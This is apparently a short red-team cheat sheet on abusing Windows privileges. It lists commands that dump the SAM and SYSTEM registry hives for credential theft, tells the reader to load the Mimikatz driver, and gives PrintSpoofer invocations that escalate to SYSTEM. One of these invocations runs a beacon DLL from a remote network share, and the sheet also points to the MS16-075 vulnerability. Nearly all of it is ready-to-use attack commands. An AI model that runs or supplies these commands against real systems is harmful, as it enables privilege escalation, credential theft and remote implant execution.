Privilege Abuse
SeBackupPrivilegeâ
reg save HKLM\SYSTEM c:\temp\system.hive
reg save HKLM\SAM c:\temp\sam.hive
SeLoadDriverPrivilegeâ
You can load the mimidrv using !+
in Mimikatz. Remember to clean after yourself !-
.
SeImpersonatePrivilegeâ
Windows 10 - Server 2016 / 2019â
PrintSpoofer64.exe -c "rundll32 \\<hostname>\<share>\<beacon.dll,Start>"
PrintSpoofer64.exe -i -c powershell (interactive shell)
Older systemsâ
info
You can use the MS16-075 vulnerability.